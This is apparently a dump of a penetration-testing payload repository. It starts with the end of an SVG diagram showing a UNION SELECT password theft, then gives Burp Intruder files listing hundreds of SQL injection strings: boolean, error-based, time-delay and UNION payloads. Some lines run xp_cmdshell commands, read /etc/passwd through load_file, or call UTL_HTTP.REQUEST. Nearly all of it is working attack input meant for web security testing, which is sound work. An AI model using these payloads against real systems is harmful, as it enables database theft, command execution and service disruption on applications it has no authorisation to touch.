141.81,312.28,142.4,312.15Zm-18,6.11h0l-.6.22-.52.2-.44.16h0c-1.18.46-2.32.93-3.32,1.43,0,0,0,0-.16.08l-.67.36c-2.87,1.65-3,3.39-4.71,2.69-1-.39-.77-2-.14-2.58a1.48,1.48,0,0,0-.52.69,1.29,1.29,0,0,1-1.19-1.44c.15-1.89,2-1.24,5.21-1.78l.14,0,.14,0a43.78,43.78,0,0,0,6.27-1.86l.08,0,0,.09c.3.47.45,1.07.78,1.66h0ZM129,319.9Zm.12-.59.08-.11A.59.59,0,0,1,129.09,319.31Zm7.2-1.93.55.2h0l.21.07h0l.11,0h0l.44.16a26.63,26.63,0,0,0,2.75.81c.56.13,1.08.21,1.56.28l.44.06,1,.1h.07c1.5.17,2.33.33,2.39,1.59a1.3,1.3,0,0,1-1.25,1.39,1.39,1.39,0,0,0-.5-.7,2,2,0,0,1,.37,1.94v0a1,1,0,0,1-.6.58c-1.78.63-1.8-1.1-4.6-2.86l-.65-.39c-.46-.26-1.94-1-1.94-1-1-.47-2.07-.92-3.13-1.35a11.6,11.6,0,0,0,.91-1.72Zm.2-3.18,0,0Zm1.48-3.81,0,.57c0,.14,0,.28,0,.42a3.34,3.34,0,0,1-.54,1.89,3.25,3.25,0,0,1-1,1c-.91.56-1.94.75-2.32,1.11a2.21,2.21,0,0,0-.34.48,4,4,0,0,0-.21.47,3.45,3.45,0,0,1-.51.94,2.67,2.67,0,0,1-.05.93.66.66,0,0,1-.36.33l-.11,0-.12,0a1.11,1.11,0,0,1-.1-.59v-.08l-.06,0v0a3.42,3.42,0,0,1,0,.55c.06.43-.56.8-.6-.24,0-.05,0-.09,0-.14l-.11,0v.08c0,.51.15,1-.35,1.09s-.41-.37-.36-1.05l-.3,0c0,.56.28,1.23-.49,1.22a.87.87,0,0,1-.31-.05c-.27-.11-.25-.55-.25-.55,0-.17,0-.37.05-.59h-.31c0,.49.21,1-.29,1.15h-.2c-.72,0-.57-.47-.51-1.22l-.22,0c0,.53.08,1.12-.36,1s-.4-.45-.36-1.13l-.1,0c0,.44,0,.83-.3.76s-.32-.3-.3-.73a1.34,1.34,0,0,1,0-.2l-.06,0a1.66,1.66,0,0,1,0,.24c0,.68-.39.3-.56.2a.56.56,0,0,1-.27-.45v-.22a1.89,1.89,0,0,0,0-.27,2.67,2.67,0,0,1-.46-.63v0c-.11-.21-.2-.43-.31-.64a3,3,0,0,0-.28-.44l-.07-.09c-.32-.36-1.23-.68-2.07-1.28a4.19,4.19,0,0,1-1-1,3.56,3.56,0,0,1-.61-2.15,1.69,1.69,0,0,0,0-.23c0-.19,0-.38,0-.57l0-.34a10.5,10.5,0,0,1,.61-2.28h0c0-.09.08-.19.12-.29l.07-.15v0c1.07-2.24,1.25-4,.86-5.06l-.28-.34c-.16.37-.45,1.86-1,3.73l0,.19c-.13.49-.27,1-.43,1.51a.36.36,0,0,1,0,.11l-.14.54-.06.28c0-.11,0-.22-.08-.33l-.14-.6c-.66-2.66-1.53-5-.09-6.94a8.55,8.55,0,0,1,2-1.89s1.07-.68,1.34-.81a12.33,12.33,0,0,1,10.57-.35.23.23,0,0,1,.21.1,9.65,9.65,0,0,1,3.88,3.07,4.4,4.4,0,0,1,.44.79l.11.26c.69,1.91.06,4.16-.39,6.71,0-.2-.08-.4-.14-.6-.52-2-.84-3.8-1-4.79l-.07-.33c-.08-.34-.14-.5-.19-.43a2.89,2.89,0,0,0-.19.35,6.13,6.13,0,0,0-.22.81,8.53,8.53,0,0,0,.86,4.33,9.44,9.44,0,0,1,.7,2.71A1.5,1.5,0,0,1,138,310.39Zm.85,2.33-.18.06L138,313a5,5,0,0,0,.51-2.18s0-.08,0-.13h0l1.28-.56.66-.3,1.09-.52c1.79-.89,1.77-2.16,3-1.87a1.46,1.46,0,0,1,.28,2.4,1.39,1.39,0,0,0,.53-.63.93.93,0,0,1,.65.74c-.09.94-.66,1.22-1.49,1.37l-.61.08c-.37,0-.77.09-1.19.16h0l-.43.08A27.58,27.58,0,0,0,138.82,312.72Z" fill="#4c5054"/><path d="M130.75,314.58l-.13-.7c-.23-1.21-1-2.25-1.37-2.26s-1,.78-1.34,1.76c0,.14-.08.29-.11.45v.05a11.68,11.68,0,0,0-.27,2.06c0,.46.16.41.38.17l.2-.24.09-.11h0l0-.06h0l.09-.12c.3-.39.62-.78.87-.77s.42.24.66.52l.2.26c.56.74,1,1.49.79-.42C130.81,315,130.78,314.8,130.75,314.58Z" fill="#4c5054"/><path d="M128.34,308.09c-.16-.92-1.14-.93-3.91-1.43a1.64,1.64,0,0,0-.44,0h-.08l-.21.05-.25.1a3.33,3.33,0,0,0-1.54,2.95v0a5.9,5.9,0,0,0,.06.59v0h0a2.23,2.23,0,0,0,.1.43s0,.05,0,.07a1.94,1.94,0,0,0,.39.67,2,2,0,0,0,.7.51,5,5,0,0,0,1.5.26,3.65,3.65,0,0,0,.55-.05h.12a6.14,6.14,0,0,0,.74-.18A3.37,3.37,0,0,0,128.34,308.09Z" fill="#4c5054"/><path d="M136.51,308.75l0,0c0-.14-.09-.28-.14-.41h0l-.07-.17a3.81,3.81,0,0,0-.23-.4l0,0h0a1.87,1.87,0,0,0-1.78-.93l-.88.12h-.05l0,0h0l0,0c-2.07.28-2.85.35-3,1.16a3.37,3.37,0,0,0,2.07,4.1,4.7,4.7,0,0,0,2.35.25,3.36,3.36,0,0,0,.71-.22l.1-.05.05,0h0a1.31,1.31,0,0,0,.19-.12,2,2,0,0,0,.26-.24l.06-.06a1.91,1.91,0,0,0,.32-.56,3.79,3.79,0,0,0,.13-2.25Z" fill="#4c5054"/><ellipse cx="115.36" cy="171.01" rx="4.19" ry="2.28" fill="#fff"/><ellipse cx="141.8" cy="171.01" rx="4.19" ry="2.28" fill="#fff"/><line x1="342.32" y1="277.99" x2="340.82" y2="277.99" fill="none" stroke="#dce3e5" stroke-miterlimit="10" stroke-width="2"/><line x1="337.8" y1="277.99" x2="309.14" y2="277.99" fill="none" stroke="#dce3e5" stroke-miterlimit="10" stroke-width="2" stroke-dasharray="3.02 3.02"/><line x1="307.63" y1="277.99" x2="306.13" y2="277.99" fill="none" stroke="#dce3e5" stroke-miterlimit="10" stroke-width="2"/><line x1="445.15" y1="278.19" x2="443.65" y2="278.19" fill="none" stroke="#dce3e5" stroke-miterlimit="10" stroke-width="2"/><line x1="440.63" y1="278.19" x2="411.97" y2="278.19" fill="none" stroke="#dce3e5" stroke-miterlimit="10" stroke-width="2" stroke-dasharray="3.02 3.02"/><line x1="410.46" y1="278.19" x2="408.96" y2="278.19" fill="none" stroke="#dce3e5" stroke-miterlimit="10" stroke-width="2"/><line x1="446.46" y1="309.69" x2="444.96" y2="309.69" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="441.99" y1="309.69" x2="306.99" y2="309.69" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2" stroke-dasharray="2.97 2.97"/><line x1="305.51" y1="309.69" x2="304.01" y2="309.69" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><rect x="304.51" y="185.92" width="143.11" height="131.78" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><polygon points="490.24 120.72 496.24 111.91 502.24 120.91 490.24 120.72" fill="#cbd0d1"/><path d="M157.06,165.49c0-7.42-1.75-14.79-9.75-14.79h-34.5c-11.64,0-17.24-2.48-19.8-5.45a7.94,7.94,0,0,1-2-5.33c0-4.5,4.74-6.1-2.42-10.86,4-1.16,13,.47,14.91,5,1.88-3.53,7.48-14.15,1.75-20,5.25,1.75,14.42,10.58,12.84,20.75,5.58-4.75,9.56-19.63,8.08-23.71,6.63,5.21,10.09,16.71,8.42,25.83,4.75-.16,12.41-8.62,10.12-19.62,6,6.75,10.08,14,8.28,22.31,5.26,1.44,8.4-4.56,9.26-9.56,8.85,21.12-.26,35.72-.26,35.72Z" fill="#4c5054"/><path d="M92.4,166.33c3.67-2.35,9.21.34,9-1.35-.75-6.12-.33-11.31,5.17-14.56l-12.44-4.08c-3.69-.58-2.75,3.59-3.06,10.83a9.1,9.1,0,0,0,3.83,8.19" fill="#4c5054"/><polygon points="48.19 57.33 54.19 48.52 60.19 57.52 48.19 57.33" fill="#cbd0d1"/><rect x="17.97" y="18.35" width="399.67" height="30" fill="#ebf0f2" stroke="#4c5054" stroke-miterlimit="10"/><rect x="294.32" y="67.51" width="468.44" height="42.66" fill="#ebf0f2" stroke="#4c5054" stroke-miterlimit="10"/><text transform="translate(21.97 35.92)" font-size="14" fill="#333332" font-family="Courier-Bold, Courier" font-weight="700">' UNION SELECT username, password FROM users--</text><text transform="translate(302.57 83.16)" font-size="14" fill="#333332" font-family="Courier-Bold, Courier" font-weight="700">SELECT name, description FROM products WHERE category <tspan x="0" y="16.8">= 'Gifts' UNION SELECT username, password FROM users--</tspan></text><rect x="586.75" y="330.91" width="133.09" height="24.27" rx="11.43" ry="11.43" fill="#edd6d6" stroke="#d60000" stroke-miterlimit="10"/><text transform="translate(614.31 347.36)" font-size="14" fill="#d60000" font-family="Arial-BoldMT, Arial" font-weight="700">All passwords</text><path d="M601.64,336.92l-.48,4.35,4.41-1.23.39,3-4,.29,2.63,3.5-2.68,1.43-1.84-3.69-1.62,3.67-2.79-1.41,2.61-3.5-4-.31.46-3,4.31,1.23-.48-4.35Z" fill="#d60000"/><rect x="487.85" y="374.79" width="145.73" height="24.27" rx="12.13" ry="12.13" fill="#edd6d6" stroke="#d60000" stroke-miterlimit="10"/><text transform="translate(524.17 391.23)" font-size="14" fill="#d60000" font-family="Arial-BoldMT, Arial" font-weight="700">All usernames</text><path d="M509.52,386.4a4.54,4.54,0,0,0,2.19-4,3.93,3.93,0,1,0-7.78,0,4.52,4.52,0,0,0,2.37,4.1c-2.17,2.89-6.39.19-6.4,9h16.48C516.38,388.19,511.73,389.52,509.52,386.4Z" fill="none" stroke="#d60000" stroke-miterlimit="10"/><polygon points="508.14 395.9 506.74 394.24 507.56 388.35 506.79 387.29 507.58 386.61 508.26 386.61 509.1 387.25 508.43 388.31 509.68 394.21 508.14 395.9" fill="#d60000"/><polyline points="633.58 386.93 742.43 386.93 742.43 341.15" fill="none" stroke="#d60000" stroke-miterlimit="10"/><polyline points="487.85 386.93 464.05 386.93 464.05 343.05" fill="none" stroke="#d60000" stroke-miterlimit="10"/><polygon points="692.2 392.93 683.39 386.93 692.39 380.93 692.2 392.93" fill="#d60000"/></svg>
--------------------------------------------------------------------------------
/Intruder/detect/GenericBlind.txt:
--------------------------------------------------------------------------------
1 | sleep(__TIME__)#
2 | 1 or sleep(__TIME__)#
3 | " or sleep(__TIME__)#
4 | ' or sleep(__TIME__)#
5 | " or sleep(__TIME__)="
6 | ' or sleep(__TIME__)='
7 | 1) or sleep(__TIME__)#
8 | ") or sleep(__TIME__)="
9 | ') or sleep(__TIME__)='
10 | 1)) or sleep(__TIME__)#
11 | ")) or sleep(__TIME__)="
12 | ')) or sleep(__TIME__)='
13 | ;waitfor delay '0:0:__TIME__'--
14 | );waitfor delay '0:0:__TIME__'--
15 | ';waitfor delay '0:0:__TIME__'--
16 | ";waitfor delay '0:0:__TIME__'--
17 | ');waitfor delay '0:0:__TIME__'--
18 | ");waitfor delay '0:0:__TIME__'--
19 | ));waitfor delay '0:0:__TIME__'--
20 | '));waitfor delay '0:0:__TIME__'--
21 | "));waitfor delay '0:0:__TIME__'--
22 | benchmark(10000000,MD5(1))#
23 | 1 or benchmark(10000000,MD5(1))#
24 | " or benchmark(10000000,MD5(1))#
25 | ' or benchmark(10000000,MD5(1))#
26 | 1) or benchmark(10000000,MD5(1))#
27 | ") or benchmark(10000000,MD5(1))#
28 | ') or benchmark(10000000,MD5(1))#
29 | 1)) or benchmark(10000000,MD5(1))#
30 | ")) or benchmark(10000000,MD5(1))#
31 | ')) or benchmark(10000000,MD5(1))#
32 |
--------------------------------------------------------------------------------
/Intruder/detect/Generic_ErrorBased.txt:
--------------------------------------------------------------------------------
1 | OR 1=1
2 | OR 1=0
3 | OR x=x
4 | OR x=y
5 | OR 1=1#
6 | OR 1=0#
7 | OR x=x#
8 | OR x=y#
9 | OR 1=1--
10 | OR 1=0--
11 | OR x=x--
12 | OR x=y--
13 | OR 3409=3409 AND ('pytW' LIKE 'pytW
14 | OR 3409=3409 AND ('pytW' LIKE 'pytY
15 | HAVING 1=1
16 | HAVING 1=0
17 | HAVING 1=1#
18 | HAVING 1=0#
19 | HAVING 1=1--
20 | HAVING 1=0--
21 | AND 1=1
22 | AND 1=0
23 | AND 1=1--
24 | AND 1=0--
25 | AND 1=1#
26 | AND 1=0#
27 | AND 1=1 AND '%'='
28 | AND 1=0 AND '%'='
29 | AND 1083=1083 AND (1427=1427
30 | AND 7506=9091 AND (5913=5913
31 | AND 1083=1083 AND ('1427=1427
32 | AND 7506=9091 AND ('5913=5913
33 | AND 7300=7300 AND 'pKlZ'='pKlZ
34 | AND 7300=7300 AND 'pKlZ'='pKlY
35 | AND 7300=7300 AND ('pKlZ'='pKlZ
36 | AND 7300=7300 AND ('pKlZ'='pKlY
37 | AS INJECTX WHERE 1=1 AND 1=1
38 | AS INJECTX WHERE 1=1 AND 1=0
39 | AS INJECTX WHERE 1=1 AND 1=1#
40 | AS INJECTX WHERE 1=1 AND 1=0#
41 | AS INJECTX WHERE 1=1 AND 1=1--
42 | AS INJECTX WHERE 1=1 AND 1=0--
43 | WHERE 1=1 AND 1=1
44 | WHERE 1=1 AND 1=0
45 | WHERE 1=1 AND 1=1#
46 | WHERE 1=1 AND 1=0#
47 | WHERE 1=1 AND 1=1--
48 | WHERE 1=1 AND 1=0--
49 | ORDER BY 1--
50 | ORDER BY 2--
51 | ORDER BY 3--
52 | ORDER BY 4--
53 | ORDER BY 5--
54 | ORDER BY 6--
55 | ORDER BY 7--
56 | ORDER BY 8--
57 | ORDER BY 9--
58 | ORDER BY 10--
59 | ORDER BY 11--
60 | ORDER BY 12--
61 | ORDER BY 13--
62 | ORDER BY 14--
63 | ORDER BY 15--
64 | ORDER BY 16--
65 | ORDER BY 17--
66 | ORDER BY 18--
67 | ORDER BY 19--
68 | ORDER BY 20--
69 | ORDER BY 21--
70 | ORDER BY 22--
71 | ORDER BY 23--
72 | ORDER BY 24--
73 | ORDER BY 25--
74 | ORDER BY 26--
75 | ORDER BY 27--
76 | ORDER BY 28--
77 | ORDER BY 29--
78 | ORDER BY 30--
79 | ORDER BY 31337--
80 | ORDER BY 1#
81 | ORDER BY 2#
82 | ORDER BY 3#
83 | ORDER BY 4#
84 | ORDER BY 5#
85 | ORDER BY 6#
86 | ORDER BY 7#
87 | ORDER BY 8#
88 | ORDER BY 9#
89 | ORDER BY 10#
90 | ORDER BY 11#
91 | ORDER BY 12#
92 | ORDER BY 13#
93 | ORDER BY 14#
94 | ORDER BY 15#
95 | ORDER BY 16#
96 | ORDER BY 17#
97 | ORDER BY 18#
98 | ORDER BY 19#
99 | ORDER BY 20#
100 | ORDER BY 21#
101 | ORDER BY 22#
102 | ORDER BY 23#
103 | ORDER BY 24#
104 | ORDER BY 25#
105 | ORDER BY 26#
106 | ORDER BY 27#
107 | ORDER BY 28#
108 | ORDER BY 29#
109 | ORDER BY 30#
110 | ORDER BY 31337#
111 | ORDER BY 1
112 | ORDER BY 2
113 | ORDER BY 3
114 | ORDER BY 4
115 | ORDER BY 5
116 | ORDER BY 6
117 | ORDER BY 7
118 | ORDER BY 8
119 | ORDER BY 9
120 | ORDER BY 10
121 | ORDER BY 11
122 | ORDER BY 12
123 | ORDER BY 13
124 | ORDER BY 14
125 | ORDER BY 15
126 | ORDER BY 16
127 | ORDER BY 17
128 | ORDER BY 18
129 | ORDER BY 19
130 | ORDER BY 20
131 | ORDER BY 21
132 | ORDER BY 22
133 | ORDER BY 23
134 | ORDER BY 24
135 | ORDER BY 25
136 | ORDER BY 26
137 | ORDER BY 27
138 | ORDER BY 28
139 | ORDER BY 29
140 | ORDER BY 30
141 | ORDER BY 31337
142 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
143 | RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
144 | IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
145 | IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
146 | %' AND 8310=8310 AND '%'='
147 | %' AND 8310=8311 AND '%'='
148 | and (select substring(@@version,1,1))='X'
149 | and (select substring(@@version,1,1))='M'
150 | and (select substring(@@version,2,1))='i'
151 | and (select substring(@@version,2,1))='y'
152 | and (select substring(@@version,3,1))='c'
153 | and (select substring(@@version,3,1))='S'
154 | and (select substring(@@version,3,1))='X'
155 |
--------------------------------------------------------------------------------
/Intruder/detect/Generic_SQLI.txt:
--------------------------------------------------------------------------------
1 | )%20or%20('x'='x
2 | %20or%201=1
3 | ; execute immediate 'sel' || 'ect us' || 'er'
4 | benchmark(10000000,MD5(1))#
5 | update
6 | ";waitfor delay '0:0:__TIME__'--
7 | 1) or pg_sleep(__TIME__)--
8 | ||(elt(-3+5,bin(15),ord(10),hex(char(45))))
9 | hi"""") or (""""a""""=""""a"""
10 | delete
11 | like
12 | " or sleep(__TIME__)#
13 | pg_sleep(__TIME__)--
14 | *(|(objectclass=*))
15 | declare @q nvarchar (200) 0x730065006c00650063 ...
16 | or 0=0 #
17 | insert
18 | 1) or sleep(__TIME__)#
19 | ) or ('a'='a
20 | ; exec xp_regread
21 | *|
22 | @var select @var as var into temp end --
23 | 1)) or benchmark(10000000,MD5(1))#
24 | asc
25 | (||6)
26 | a"""" or 3=3--"""
27 | " or benchmark(10000000,MD5(1))#
28 | # from wapiti
29 | or 0=0 --
30 | 1 waitfor delay '0:0:10'--
31 | or 'a'='a
32 | hi or 1=1 --"
33 | or a = a
34 | UNION ALL SELECT
35 | ) or sleep(__TIME__)='
36 | )) or benchmark(10000000,MD5(1))#
37 | hi' or 'a'='a
38 | 0
39 | 21%
40 | limit
41 | or 1=1
42 | or 2 > 1
43 | ")) or benchmark(10000000,MD5(1))#
44 | PRINT
45 | hi') or ('a'='a
46 | or 3=3
47 | ));waitfor delay '0:0:__TIME__'--
48 | a' waitfor delay '0:0:10'--
49 | 1;(load_file(char(47,101,116,99,47,112,97,115, ...
50 | or%201=1
51 | 1 or sleep(__TIME__)#
52 | or 1=1
53 | and 1 in (select var from temp)--
54 | or '7659'='7659
55 | or 'text' = n'text'
56 | --
57 | or 1=1 or ''='
58 | declare @s varchar (200) select @s = 0x73656c6 ...
59 | exec xp
60 | ; exec master..xp_cmdshell 'ping 172.10.1.255'--
61 | 3.10E+17
62 | or pg_sleep(__TIME__)--"
63 | x' AND email IS NULL; --
64 | &
65 | admin' or '
66 | or 'unusual' = 'unusual'
67 | //
68 | truncate
69 | 1) or benchmark(10000000,MD5(1))#
70 | \x27UNION SELECT
71 | declare @s varchar(200) select @s = 0x77616974 ...
72 | tz_offset
73 | sqlvuln
74 | "));waitfor delay '0:0:__TIME__'--
75 | ||6
76 | or%201=1 --
77 | %2A%28%7C%28objectclass%3D%2A%29%29
78 | or a=a
79 | ) union select * from information_schema.tables;
80 | PRINT @@variable
81 | or isNULL(1/0) /*
82 | 26 %
83 | or ""a""=""a"
84 | (sqlvuln)
85 | x' AND members.email IS NULL; --
86 | or 1=1--
87 | and 1=( if((load_file(char(110,46,101,120,11 ...
88 | 0x770061006900740066006F0072002000640065006C00 ...
89 | %20'sleep%2050'
90 | as
91 | 1)) or pg_sleep(__TIME__)--
92 | /**/or/**/1/**/=/**/1
93 | union all select @@version--
94 | ,@variable
95 | (sqlattempt2)
96 | or (EXISTS)
97 | t'exec master..xp_cmdshell 'nslookup www.googl ...
98 | %20$(sleep%2050)
99 | 1 or benchmark(10000000,MD5(1))#
100 | %20or%20''='
101 | ||UTL_HTTP.REQUEST
102 | or pg_sleep(__TIME__)--
103 | hi' or 'x'='x';
104 | ) or sleep(__TIME__)=
105 | or 'whatever' in ('whatever')
106 | ; begin declare @var varchar(8000) set @var=' ...
107 | union select 1,load_file('/etc/passwd'),1,1,1;
108 | 0x77616974666F722064656C61792027303A303A313027 ...
109 | exec(@s)
110 | ) or pg_sleep(__TIME__)--
111 | union select
112 | or sleep(__TIME__)#
113 | select * from information_schema.tables--
114 | a' or 1=1--
115 | a' or 'a' = 'a
116 | declare @s varchar(22) select @s =
117 | or 2 between 1 and 3
118 | or a=a--
119 | or '1'='1
120 | |
121 | or sleep(__TIME__)='
122 | or 1 --'
123 | or 0=0 #"
124 | having
125 | a'
126 | " or isNULL(1/0) /*
127 | declare @s varchar (8000) select @s = 0x73656c ...
128 | â or 1=1 --
129 | char%4039%41%2b%40SELECT
130 | order by
131 | bfilename
132 | having 1=1--
133 | ) or benchmark(10000000,MD5(1))#
134 | or username like char(37);
135 | ;waitfor delay '0:0:__TIME__'--
136 | or 1=1--"
137 | x' AND userid IS NULL; --
138 | */*
139 | or 'text' > 't'
140 | (select top 1
141 | or benchmark(10000000,MD5(1))#
142 | ");waitfor delay '0:0:__TIME__'--
143 | a' or 3=3--
144 | -- &password=
145 | group by userid having 1=1--
146 | or ''='
147 | ; exec master..xp_cmdshell
148 | %20or%20x=x
149 | select
150 | )) or sleep(__TIME__)="""
151 | 0x730065006c0065006300740020004000400076006500 ...
152 | hi' or 1=1 --
153 | ") or pg_sleep(__TIME__)--
154 | %20or%20'x'='x
155 | or 'something' = 'some'+'thing'
156 | exec sp
157 | 29 %
158 | (
159 | ý or 1=1 --
160 | 1 or pg_sleep(__TIME__)--
161 | 0 or 1=1
162 | ) or (a=a
163 | uni/**/on sel/**/ect
164 | replace
165 | %27%20or%201=1
166 | )) or pg_sleep(__TIME__)--
167 | %7C
168 | x' AND 1=(SELECT COUNT(*) FROM tabname); --
169 | '%20OR
170 | ; or '1'='1'
171 | declare @q nvarchar (200) select @q = 0x770061 ...
172 | 1 or 1=1
173 | ; exec ('sel' + 'ect us' + 'er')
174 | 23 OR 1=1
175 | /
176 | anything' OR 'x'='x
177 | declare @q nvarchar (4000) select @q =
178 | or 0=0 --
179 | desc
180 | ||'6
181 | )
182 | 1)) or sleep(__TIME__)#
183 | or 0=0 #
184 | select name from syscolumns where id = (sele ...
185 | hi or a=a
186 | *(|(mail=*))
187 | password:*/=1--
188 | distinct
189 | );waitfor delay '0:0:__TIME__'--
190 | to_timestamp_tz
191 | ) or benchmark(10000000,MD5(1))#"
192 | %2A%28%7C%28mail%3D%2A%29%29
193 | #NAME?
194 | or 1=1 /*
195 | )) or sleep(__TIME__)='
196 | or 1=1 or ""=
197 | or 1 in (select @@version)--
198 | sqlvuln;
199 | union select * from users where login = char ...
200 | x' or 1=1 or 'x'='y
201 | 28%
202 | â or 3=3 --
203 | @variable
204 | or '1'='1'--
205 | a" or 1=1--
206 | //*
207 | %2A%7C
208 | " or 0=0 --
209 | )) or pg_sleep(__TIME__)--"
210 | ?
211 | or 1/*
212 | !
213 | '
214 | or a = a
215 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
216 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
217 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
218 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
219 | ' or 1=1
220 | � or 1=1 --
221 | x' OR full_name LIKE '%Bob%
222 | '; exec master..xp_cmdshell 'ping 172.10.1.255'--
223 | '%20or%20''='
224 | '%20or%20'x'='x
225 | ')%20or%20('x'='x
226 | ' or 0=0 --
227 | ' or 0=0 #
228 | or 0=0 #"
229 | ' or 1=1--
230 | ' or '1'='1'--
231 | ' or 1 --'
232 | or 1=1--
233 | ' or 1=1 or ''='
234 | or 1=1 or ""=
235 | ' or a=a--
236 | or a=a
237 | ') or ('a'='a
238 | 'hi' or 'x'='x';
239 | or
240 | procedure
241 | handler
242 | ' or username like '%
243 | ' or uname like '%
244 | ' or userid like '%
245 | ' or uid like '%
246 | ' or user like '%
247 | '; exec master..xp_cmdshell
248 | '; exec xp_regread
249 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
250 | ' UNION SELECT
251 | ' UNION ALL SELECT
252 | ' or (EXISTS)
253 | ' (select top 1
254 | '||UTL_HTTP.REQUEST
255 | 1;SELECT%20*
256 | <>"'%;)(&+
257 | '%20or%201=1
258 | 'sqlattempt1
259 | 29%
260 | 26%
261 | ' or ''='
262 | ' or 3=3
263 | ' or 3=3 --
264 |
--------------------------------------------------------------------------------
/Intruder/detect/Generic_TimeBased.txt:
--------------------------------------------------------------------------------
1 | # from wapiti
2 | sleep(5)#
3 | 1 or sleep(5)#
4 | " or sleep(5)#
5 | ' or sleep(5)#
6 | " or sleep(5)="
7 | ' or sleep(5)='
8 | 1) or sleep(5)#
9 | ") or sleep(5)="
10 | ') or sleep(5)='
11 | 1)) or sleep(5)#
12 | ")) or sleep(5)="
13 | ')) or sleep(5)='
14 | ;waitfor delay '0:0:5'--
15 | );waitfor delay '0:0:5'--
16 | ';waitfor delay '0:0:5'--
17 | ";waitfor delay '0:0:5'--
18 | ');waitfor delay '0:0:5'--
19 | ");waitfor delay '0:0:5'--
20 | ));waitfor delay '0:0:5'--
21 | '));waitfor delay '0:0:5'--
22 | "));waitfor delay '0:0:5'--
23 | benchmark(10000000,MD5(1))#
24 | 1 or benchmark(10000000,MD5(1))#
25 | " or benchmark(10000000,MD5(1))#
26 | ' or benchmark(10000000,MD5(1))#
27 | 1) or benchmark(10000000,MD5(1))#
28 | ") or benchmark(10000000,MD5(1))#
29 | ') or benchmark(10000000,MD5(1))#
30 | 1)) or benchmark(10000000,MD5(1))#
31 | ")) or benchmark(10000000,MD5(1))#
32 | ')) or benchmark(10000000,MD5(1))#
33 | pg_sleep(5)--
34 | 1 or pg_sleep(5)--
35 | " or pg_sleep(5)--
36 | ' or pg_sleep(5)--
37 | 1) or pg_sleep(5)--
38 | ") or pg_sleep(5)--
39 | ') or pg_sleep(5)--
40 | 1)) or pg_sleep(5)--
41 | ")) or pg_sleep(5)--
42 | ')) or pg_sleep(5)--
43 | AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
44 | AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
45 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
46 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
47 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
48 | SLEEP(5)#
49 | SLEEP(5)--
50 | SLEEP(5)="
51 | SLEEP(5)='
52 | or SLEEP(5)
53 | or SLEEP(5)#
54 | or SLEEP(5)--
55 | or SLEEP(5)="
56 | or SLEEP(5)='
57 | waitfor delay '00:00:05'
58 | waitfor delay '00:00:05'--
59 | waitfor delay '00:00:05'#
60 | benchmark(50000000,MD5(1))
61 | benchmark(50000000,MD5(1))--
62 | benchmark(50000000,MD5(1))#
63 | or benchmark(50000000,MD5(1))
64 | or benchmark(50000000,MD5(1))--
65 | or benchmark(50000000,MD5(1))#
66 | pg_SLEEP(5)
67 | pg_SLEEP(5)--
68 | pg_SLEEP(5)#
69 | or pg_SLEEP(5)
70 | or pg_SLEEP(5)--
71 | or pg_SLEEP(5)#
72 | '\"
73 | AnD SLEEP(5)
74 | AnD SLEEP(5)--
75 | AnD SLEEP(5)#
76 | &&SLEEP(5)
77 | &&SLEEP(5)--
78 | &&SLEEP(5)#
79 | ' AnD SLEEP(5) ANd '1
80 | '&&SLEEP(5)&&'1
81 | ORDER BY SLEEP(5)
82 | ORDER BY SLEEP(5)--
83 | ORDER BY SLEEP(5)#
84 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)
85 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
86 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
87 | +benchmark(3200,SHA1(1))+'
88 | + SLEEP(10) + '
89 | RANDOMBLOB(500000000/2)
90 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
91 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
92 | RANDOMBLOB(1000000000/2)
93 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
94 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
95 | SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
96 |
--------------------------------------------------------------------------------
/Intruder/detect/Generic_UnionSelect.txt:
--------------------------------------------------------------------------------
1 | ORDER BY SLEEP(5)
2 | ORDER BY 1,SLEEP(5)
3 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
4 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
5 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
6 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
7 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
8 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
9 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
10 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
11 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
